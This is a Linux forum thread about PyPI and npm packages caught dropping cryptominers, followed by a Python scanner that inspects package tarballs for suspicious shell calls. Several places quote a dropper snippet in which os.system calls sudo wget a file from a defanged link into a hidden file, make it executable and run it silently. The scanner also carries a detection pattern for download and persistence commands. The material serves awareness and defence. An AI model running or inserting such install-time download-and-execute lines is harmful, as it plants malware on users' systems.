Is PyPI something to look out for in Porteus?
Posted: 20 Aug 2022, 01:52
Just reading the '241 npm and PyPI packages caught dropping Linux cryptominers' article and wondered...
Code: Select all
import os  # the article's snippet omits the import; os.system needs it

# fetch the miner into a hidden dotfile, make it executable, run it; all output silenced
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
ncmprhnsbl wrote: ↑20 Aug 2022, 02:29
the fact that they (bogus packages with cryptominer scripts) were discovered is a good thing .. perhaps there'll be more oversight now..
this, though:
Code: Select all
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
would (should) prompt for a password, which should alert the user to something being off..
also, looking at the bash script shown, it looks like it creates a 'service' and calls 'systemctl', which is a systemd command that porteus doesn't have..
more generally, any package from any source on the web should be treated with caution..

OK...thanks!
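The snippet quoted above runs at install time from setup.py, so the practical question for anyone pulling packages from PyPI is how to look at a package before pip executes it. The following is an added example, not code from this thread or from the article it discusses: it parses every .py file in a source tarball with the ast module, pulls out os.system/subprocess calls, and flags the ones whose command looks like the download-and-run sequence above (sudo, wget/curl, a bit.ly link, chmod +x, systemctl, output silenced to /dev/null). The pattern list and the two sample setup.py files are assumptions constructed for the demo; the tarball is built in memory so nothing is fetched from the network.

```python
import ast
import io
import re
import tarfile

# Tells taken from the dropper quoted in the thread: escalate, download, hide output,
# make executable, persist. This pattern list is an assumption, tune it to taste.
SUSPICIOUS = re.compile(
    r"(\bsudo\b|\bwget\b|\bcurl\b|bit\[?\.\]?ly|chmod\s+\+x|systemctl|>\s*/dev/null|base64)",
    re.IGNORECASE,
)

# Callees that hand a string to a shell or spawn a process.
SHELL_FUNCS = {
    "os.system", "os.popen", "subprocess.run", "subprocess.call",
    "subprocess.check_call", "subprocess.check_output", "subprocess.Popen",
}


def _dotted_name(func):
    """Turn the callee of a Call node (e.g. os.system) into a dotted string."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def shell_calls(source):
    """Return (lineno, callee, command) for every shell-spawning call in the source.

    A command assembled at runtime (not a string literal) is reported as
    '<non-literal>': droppers often concatenate or base64-decode the command
    so that a plain grep for 'wget' finds nothing.
    """
    hits = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in SHELL_FUNCS and node.args:
            arg = node.args[0]
            if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                cmd = arg.value
            else:
                cmd = "<non-literal>"
            hits.append((node.lineno, _dotted_name(node.func), cmd))
    return sorted(hits)


def flag(source):
    """Keep only calls whose command matches the download-and-run / persistence tells."""
    return [h for h in shell_calls(source)
            if h[2] == "<non-literal>" or SUSPICIOUS.search(h[2])]


def scan_sdist(tar_bytes):
    """Walk every .py file in a gzipped source tarball and collect flagged shell calls."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar.getmembers():
            if not (member.isfile() and member.name.endswith(".py")):
                continue
            src = tar.extractfile(member).read().decode("utf-8", "replace")
            try:
                findings += [(member.name,) + h for h in flag(src)]
            except SyntaxError:
                # A setup.py that does not parse deserves a look of its own.
                findings.append((member.name, 0, "unparseable", ""))
    return findings


def build_sample_sdist(setup_py):
    """Constructed in-memory sdist so the example runs offline (not a real package)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        data = setup_py.encode()
        info = tarfile.TarInfo("pkg-1.0/setup.py")
        info.size = len(data)
        tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed setup.py mirroring the snippet quoted in the thread (defanged URL kept as-is).
MALICIOUS_SETUP = '''\
import os
from setuptools import setup

os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
setup(name="pkg", version="1.0")
'''

# Constructed clean setup.py for comparison.
BENIGN_SETUP = '''\
from setuptools import setup
setup(name="pkg", version="1.0")
'''

if __name__ == "__main__":
    for label, sample in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        for path, lineno, callee, cmd in scan_sdist(build_sample_sdist(sample)):
            print(f"{label}: {path}:{lineno} {callee}({cmd!r})")
```

To apply this to a real package, fetch the sdist without executing it, `pip download --no-deps --no-binary :all: <name>`, and pass the bytes of the resulting .tar.gz to scan_sdist. It is a triage heuristic, not a verdict: a setup.py can hide the same behaviour behind exec() or a compiled extension, and the install step runs whatever is there, so anything you are unsure of still belongs in a throwaway VM rather than on the live system.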